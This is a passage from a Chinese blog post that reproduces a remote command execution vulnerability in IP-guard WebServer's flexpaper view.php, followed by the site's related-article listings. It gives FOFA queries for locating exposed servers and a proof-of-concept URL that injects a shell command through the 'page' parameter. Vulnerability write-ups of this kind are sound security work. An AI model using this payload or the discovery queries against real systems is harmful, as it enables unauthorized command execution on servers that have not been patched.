IP-guard WebServer 命令执行漏洞复现

最新推荐文章于 2024-05-30 22:30:23 发布
最新推荐文章于 2024-05-30 22:30:23 发布
阅读量803 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/134380697
版权
漏洞复现 专栏收录该内容
36 篇文章 6 订阅 ¥9.90 ¥99.00
订阅专栏

简介

IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。

影响版本:IP-guard<4.81.0307.0

漏洞复现

FOFA语法:
app="IP-guard"
或者
web.title="IP-guard"

访问页面如下所示:

POC:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

拼接URL进行get请求:

http://ip:port/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+&

了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
IP-guard WebServer 任意文件读取漏洞复现
0xSec
04-04 667
由于IP-guard WebServer/ipg/static/appr/lib/flexpaper/php/view.php接口处未对用户输入的数据进行严格的校验和过滤。未经身份验证的攻击者可随意操纵doc参数读取系统内部配置文件造成信息泄露,使系统处于极不安全的状态。
IP-GUARD使用Chrome/edge浏览器出现不兼容的问题
IP-Guard专栏
10-24 3210
2.1、安装新版本解决:最新发布的新版本,针对以上问题,IP-guard客户端采取的处理方案是在注入模块前判断当前进程是否存在数字签名验证策略,是则不注入模块,这种方法只能让IP-guard客户端模块不会强制加载到这些浏览器进程当中,但是需要注意的是,还可能存在其它软件未进行相应处理尝试直接注入到浏览器。此两条配置的作用是屏蔽对 chrome/edge 浏览器进程执行主动注入,屏蔽后,客户端的功能模块还可以通过其它方式注入到浏览器进程中,客户端与浏览器相关的功能(包括加密功能)不会受到影响。
ip-guard文档云备份服务器安装
野生钢铁侠
06-21 675
ip-guard文档云备份服务器安装
ip-guard安全网关问题集锦一
IP-Guard专栏
11-24 872
需要调整网络,让访问应用服务器的流量会经过安全网关,且应用服务器有固定ip、域名的话,可以将应用服务器设置为受保护服务器,实现效果,控制范围内的机器,需要有安装加密客户端,并启用安全通讯设置的,才可以访问服务器。如果在使用安全网关的情况下,同时配置了安全代理的客户端,会使客户端电脑上的安全进程发出的流量不符合安全网关规范,因此会导致无法访问受安全网关保护的服务器。此时如果还需要使用安全进程去访问受安全网关保护的服务器,就需要添加一个安全代理黑名单的配置,使安全进程与指定的受保护服务器的通信加密。
IP-guard WebServer RCE漏洞复现
0xSec
11-09 2746
IP-guard WebServer存在远程命令执行漏洞情报。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。
IP_Guard_全面破解方法
10-12
IP_Guard_全面破解方法。IP_Guard_全面破解方法。IP_Guard_全面破解方法
IP-guard Webserver view 远程命令执行漏洞【2023最新漏洞
holyxp的博客
11-12 2481
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
漏洞复现--IP-guard flexpaper RCE
qq_53003652的博客
11-13 638
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。该产品存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令直接获取服务器权限。ping后加上dnslog验证。
IP-guard Web系统远程命令执行漏洞说明
IP-Guard专栏
11-21 1023
漏洞修补程序,可用于使用任意IP-guard版本环境的Web系统执行修复,修补程序会根据当前系统中安装的web系统执行相应的修复处理;近期收到反馈,IP-guard Web服务器存在远程命令执行漏洞(RCE),经过分析,确认是因为Web系统的申请审批功能使用了开源插件 flexpaper 实现文件在线预览功能,此插件存在远程代码执行漏洞。使用完整更新包会同时更新所有Web系统使用的组件,为减少更新Web系统带来的兼容性影响,需要根据当前使用的IP-guard版本采取不同的更新方式。使用漏洞修补程序处理。
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
wecanning的博客
11-10 643
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
IP-guard 双机热备使用说明
10-10
双机热备使用说明 一、简介 服务器双机热备功能把主从服务器、数据库分别部署到 3 台机器上,实现主-从服务器 共享一个数据库,并且保持三者之间的通讯。当主服务器出现故障时,从服务器能及时响应 ...
IP-guard产品测试用例(全模块).pdf
02-14
IP-guard桌面管理系统,运用全面而细致地从文档操作管理、即时通讯、邮件管控、资产管理、移动存储设备、上网行为管理、屏幕监控、系统管理等方面进行详尽细致审计、全面严格管控和安全稳定的加密,满足企业防止信息...
IP-Guard初级工程师认证培训资料
01-08
IP-guard企业信息监管系统,是一款领先的内网安全软件,它能够协助企业解决最棘手的内网安全问题,借助IP-guard强大的功能,企业能够有效地进行用户行为管理,防范信息外泄,文档透明加密,敏感内容识别管理系统DLP...
IP-Guard上机练习题2020.docx
05-02
IP-guard企业信息监管系统,是一款领先的内网安全软件,它能够协助企业解决最棘手的内网安全问题,借助IP-guard强大的功能,企业能够有效地进行用户行为管理,防范信息外泄,文档透明加密,敏感内容识别管理系统DLP...
IP-Guard的LINUX客户端用户手册.pdf
04-08
连着同一台服务器的linux与windows客户端,2者之间的密文可通用,即在windows加密客户端上编辑的代码(密文),拿到linux加密客户端机器上也可编译;linu加密客户端上编译生成的密文,在windows加密客户端下也可正常...
ip-guard软件中心服务器安装
野生钢铁侠
06-21 1604
ip-guard软件中心服务器安装
linux系统安全及应用
最新发布
Alone8046的博客
05-30 236
一、新的服务器到手该如何部署:1.配置IP地址,网关,dns解析,内外网。3.磁盘分区:lvm及raid。二、应用:1.不需要或者不想登录的用户设置为nologin:usermod -s nologin +用户。解锁文件:chattr -i /etc/passwd。提供了一种标准的身份认证的接口(对账号权限进行控制),可以允许管理员定制化配置各种认证方式和方法。(配置的时候一定要注意:有限放开原则,用什么给什么,不需要的不加)会话管理模块:管理用户的会话,记录会话信息,注销用户的会话,远程终端连接。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 926
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
适合能源企业的文档安全外发系统应该是什么样的?
文件数据安全交换
05-29 292
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
ip-guard教程
11-26
IP-Guard 是一种网络安全软件,它可以帮助管理者监控和保护公司内部网络,防止未经授权的访问和数据泄露。下面是一个简单的 IP-Guard 教程,帮助你更好地了解这个软件的使用方法。 首先,你需要下载并安装 IP-Guard 软件。安装完成后,你需要设置管理员账号和密码,以便后续登录和管理软件。 接下来,你需要配置 IP-Guard 软件。可以设置访问控制规则,例如允许哪些 IP 地址访问公司的内部网络,禁止哪些 IP 地址访问等。另外,你还可以设置数据泄露防护规则,防止内部员工将公司的敏感数据传输到外部网络,确保公司数据的安全。 然后,你需要监控和审计公司的网络活动。IP-Guard 可以记录所有的网络访问记录,包括谁访问了哪些网站,下载了哪些文件等。通过对这些访问记录进行分析,你可以及时发现并阻止潜在的网络安全风险,保障公司网络的安全。 最后,你需要定期维护和更新 IP-Guard 软件。网络安全威胁时刻在变化,保持软件的更新和升级可以帮助你更好地应对各种新的网络安全威胁,确保公司网络的安全稳定运行。 以上就是一个简单的 IP-Guard 教程,希望能帮助你更好地了解和使用这款网络安全软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值